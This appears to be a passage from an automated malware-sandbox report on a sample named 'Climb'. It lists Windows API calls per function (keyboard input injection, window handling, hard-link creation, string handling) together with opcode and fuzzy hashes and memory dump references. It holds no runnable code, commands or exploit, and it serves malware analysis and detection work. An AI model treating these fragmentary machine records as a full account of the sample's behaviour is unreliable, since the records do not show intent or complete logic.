                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00AD623F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3321077145-0
                                                                                                                                                                          • Opcode ID: 300f44a2ef6c459b54c4f20ebb632719fe4f65bf1627eb45dfbfc18b0cac6cb1
                                                                                                                                                                          • Instruction ID: 2c5fb48f63cbfd83a9404a16db3b32c12258f04fa70e67406fa98cfebee2ccc7
                                                                                                                                                                          • Opcode Fuzzy Hash: 300f44a2ef6c459b54c4f20ebb632719fe4f65bf1627eb45dfbfc18b0cac6cb1
                                                                                                                                                                          • Instruction Fuzzy Hash: 14416D39A00610DFCB11EF54C645A5EBBF6EF89320B188489E85A9F362CB35FD01DB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00ACB473
                                                                                                                                                                          • SetKeyboardState.USER32(00000080), ref: 00ACB48F
                                                                                                                                                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00ACB4FD
                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00ACB54F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                          • Opcode ID: ee5a001a8d98129479daf6657f53189a2f22f41444eded49c7d05940a6899cb1
                                                                                                                                                                          • Instruction ID: 08c6058707909d25baffcd85cb402fff532e6d974ea3b555ee14ed1bb4437578
                                                                                                                                                                          • Opcode Fuzzy Hash: ee5a001a8d98129479daf6657f53189a2f22f41444eded49c7d05940a6899cb1
                                                                                                                                                                          • Instruction Fuzzy Hash: 21318B70A2420C6EFF35CBA49806FFA7BB6AB54310F05421EE092961D2C3768D46C771
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardState.USER32(?,76AAC0D0,?,00008000), ref: 00ACB5B8
                                                                                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00ACB5D4
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00ACB63B
                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,76AAC0D0,?,00008000), ref: 00ACB68D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                          • Opcode ID: 95fe33f2f2c9a0b8328a2b618f6b9540d1fbd4098f3011fdd53123eecf5645a1
                                                                                                                                                                          • Instruction ID: 6c3af67c351076d7d9df07b87402ace15dc1771be8d49f1539943b6687630687
                                                                                                                                                                          • Opcode Fuzzy Hash: 95fe33f2f2c9a0b8328a2b618f6b9540d1fbd4098f3011fdd53123eecf5645a1
                                                                                                                                                                          • Instruction Fuzzy Hash: 21313B309206085EFF21CB64C806FFB7BB6AF94310F05422EE081861D1D7768946DB71
                                                                                                                                                                          APIs
                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00AF80D4
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00AF814A
                                                                                                                                                                          • PtInRect.USER32(?,?,?), ref: 00AF815A
                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 00AF81C6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1352109105-0
                                                                                                                                                                          • Opcode ID: 5e7f374a98f670dba5a7099e1b367ec1abf4f5c15a91134e09934a79450337a7
                                                                                                                                                                          • Instruction ID: 5611778936285ec2202891fe43b96daca630f86dfe432fad933809351f0c6b63
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7f374a98f670dba5a7099e1b367ec1abf4f5c15a91134e09934a79450337a7
                                                                                                                                                                          • Instruction Fuzzy Hash: 72416D30A01219DFDB11CFD8C884AB9B7F5BB45314F2443A8FA549B261CB39A882CB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00AF2187
                                                                                                                                                                            • Part of subcall function 00AC4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC43AD
                                                                                                                                                                            • Part of subcall function 00AC4393: GetCurrentThreadId.KERNEL32 ref: 00AC43B4
                                                                                                                                                                            • Part of subcall function 00AC4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AC2F00), ref: 00AC43BB
                                                                                                                                                                          • GetCaretPos.USER32(?), ref: 00AF219B
                                                                                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 00AF21E8
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00AF21EE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2759813231-0
                                                                                                                                                                          • Opcode ID: a1bce71b5baf35a40276a4c1449d9378e9918793ba2ff49f49297a2b1cf5a034
                                                                                                                                                                          • Instruction ID: b52793b2b90d81e7de0cbe462da40d15bb2c7451ee2c800c4a4140d7c7bd6d46
                                                                                                                                                                          • Opcode Fuzzy Hash: a1bce71b5baf35a40276a4c1449d9378e9918793ba2ff49f49297a2b1cf5a034
                                                                                                                                                                          • Instruction Fuzzy Hash: 18317075D00209AFC704EFE9C981DAEBBFCEF98304B50806AE515E7211EB359E45CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A641EA: _wcslen.LIBCMT ref: 00A641EF
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00ACE8E2
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00ACE8F9
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00ACE924
                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00ACE92F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3763101759-0
                                                                                                                                                                          • Opcode ID: 8e1150ba8ebc389152aab114e85312f4db1e8edec4aae0cdd253ccf46fa5d675
                                                                                                                                                                          • Instruction ID: 3cb2bcd2f94e15806552c3a0cb954dd95594ae4282ff0413c79b82a7128c92ae
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e1150ba8ebc389152aab114e85312f4db1e8edec4aae0cdd253ccf46fa5d675
                                                                                                                                                                          • Instruction Fuzzy Hash: 8E21C771D00215AFDB11EFA4DA82FAEF7F8EF49360F154169E804BB281D6709E41C7A1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00AF9A5D
                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AF9A72
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00AF9ABA
                                                                                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00AF9AF0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2864067406-0
                                                                                                                                                                          • Opcode ID: 7269d4ab6075b6f45aa498e8aec66f829d67da2604be8fb184ee756b3b89559b
                                                                                                                                                                          • Instruction ID: cedc48573d80101e4dc05fb24dacc474e3bdf32e001c3822b5e8c60d717a247f
                                                                                                                                                                          • Opcode Fuzzy Hash: 7269d4ab6075b6f45aa498e8aec66f829d67da2604be8fb184ee756b3b89559b
                                                                                                                                                                          • Instruction Fuzzy Hash: 6C217A35600018AFCF269FD4C858FFF7BBAEB49390F504166FA098B1A1D7319952DB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,00AFDC30), ref: 00ACDBA6
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00ACDBB5
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00ACDBC4
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00AFDC30), ref: 00ACDC21
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2267087916-0
                                                                                                                                                                          • Opcode ID: 2892ae2ecf4a8478727d5420f6b48c1f96892092351e4a0d6f0f34630b16df4e
                                                                                                                                                                          • Instruction ID: 7904df501a6f9c8bfd5721be271ce54d5a65021331ed04d0e7365d1998a23aaa
                                                                                                                                                                          • Opcode Fuzzy Hash: 2892ae2ecf4a8478727d5420f6b48c1f96892092351e4a0d6f0f34630b16df4e
                                                                                                                                                                          • Instruction Fuzzy Hash: 992183705082059F8700DF78C980EABBBF8EE55764F114A2DF499C72A1DB31DD46DB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00AF32A6
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF32C0
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF32CE
                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00AF32DC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2169480361-0
                                                                                                                                                                          • Opcode ID: 55be2b39bf2d017db689aab6b786939c9521b9b09554b080106a5ff2eb6a2d11
                                                                                                                                                                          • Instruction ID: 2c436bf4a086e1202ecb563bfd15a1918713d47e5e2e7f086ac475aac9934efb
                                                                                                                                                                          • Opcode Fuzzy Hash: 55be2b39bf2d017db689aab6b786939c9521b9b09554b080106a5ff2eb6a2d11
                                                                                                                                                                          • Instruction Fuzzy Hash: D8210632205115AFDB15DBA4C845FBABBA5EF91324F248258F9268B2D2C771EE42C7D0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00AC96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00AC8271,?,000000FF,?,00AC90BB,00000000,?,0000001C,?,?), ref: 00AC96F3
                                                                                                                                                                            • Part of subcall function 00AC96E4: lstrcpyW.KERNEL32(00000000,?,?,00AC8271,?,000000FF,?,00AC90BB,00000000,?,0000001C,?,?,00000000), ref: 00AC9719
                                                                                                                                                                            • Part of subcall function 00AC96E4: lstrcmpiW.KERNEL32(00000000,?,00AC8271,?,000000FF,?,00AC90BB,00000000,?,0000001C,?,?), ref: 00AC974A
                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00AC90BB,00000000,?,0000001C,?,?,00000000), ref: 00AC828A
                                                                                                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,00AC90BB,00000000,?,0000001C,?,?,00000000), ref: 00AC82B0
                                                                                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00AC90BB,00000000,?,0000001C,?,?,00000000), ref: 00AC82EB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                          • String ID: cdecl
                                                                                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                                                                                          • Opcode ID: 72634e9c7ea671469e7e15317a3e6cfe9bd305471e5264ac62f684651e5484f8
                                                                                                                                                                          • Instruction ID: 3da9294c83723fce0fc8f3a7ed6f8cdacb3be5e31bd60c1a0ae7d770f85fb139
                                                                                                                                                                          • Opcode Fuzzy Hash: 72634e9c7ea671469e7e15317a3e6cfe9bd305471e5264ac62f684651e5484f8
                                                                                                                                                                          • Instruction Fuzzy Hash: E311263A200341ABCB15AF78D848E7A77E9FF44750B11412EF906CB2A0EF359812C790
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 00AF615A
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF616C
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF6177
                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AF62B5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 455545452-0
                                                                                                                                                                          • Opcode ID: 3c47562cd7fce194dcd4a4ba2fa58f549b26d4f846107e5c20039d6ee5deb9bf
                                                                                                                                                                          • Instruction ID: 3c8faa0fc2f835a414a03ecc8e2d3b0328865a11ae9e2a6902aa6e61da336d91
                                                                                                                                                                          • Opcode Fuzzy Hash: 3c47562cd7fce194dcd4a4ba2fa58f549b26d4f846107e5c20039d6ee5deb9bf
                                                                                                                                                                          • Instruction Fuzzy Hash: E611817590021CA6DB20EFE4DD84AFE7BBCEF15354B20422AFB15D6081EB70C945CB64
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 61ecb6e69be2158e45709cde51f09c1ac9bc4f4c5f4ef207ea210e20809371ff
                                                                                                                                                                          • Instruction ID: 9c7cdc897a4de999ccb1978ca4edd26752b95c4c6c38afee227c98e4c1a849f8
                                                                                                                                                                          • Opcode Fuzzy Hash: 61ecb6e69be2158e45709cde51f09c1ac9bc4f4c5f4ef207ea210e20809371ff
                                                                                                                                                                          • Instruction Fuzzy Hash: 4901ADB23092167EFE2126B8BCC1F6B679DDF423B8B300725B521A51D1DE718C80C3A0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00AC2394
                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AC23A6
                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AC23BC
                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AC23D7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: 90a05f81e1cd232d174fce10de32d8ffbc36b62274f7b327c6fcd15b1b7d85d8
                                                                                                                                                                          • Instruction ID: 9ca5554919705ae41d36d7b45fe67a566a7473bcf381b81840e3f4d9d6b50790
                                                                                                                                                                          • Opcode Fuzzy Hash: 90a05f81e1cd232d174fce10de32d8ffbc36b62274f7b327c6fcd15b1b7d85d8
                                                                                                                                                                          • Instruction Fuzzy Hash: FD11093A900218FFEB11DBA5CD85F9DFB78FB08750F210095EA11BB290D6716E11DB94
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00A61AF4
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00AA31F9
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00AA3203
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00AA320E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4127811313-0
                                                                                                                                                                          • Opcode ID: 33741932fdf4d15c844a9b80ca65f57fa558067890254cea8e54dfd3a7f36432
                                                                                                                                                                          • Instruction ID: 6508bf8a3349508ef82d2d2abaf96c85ebf496700fb79063aa62d8a0500d7771
                                                                                                                                                                          • Opcode Fuzzy Hash: 33741932fdf4d15c844a9b80ca65f57fa558067890254cea8e54dfd3a7f36432
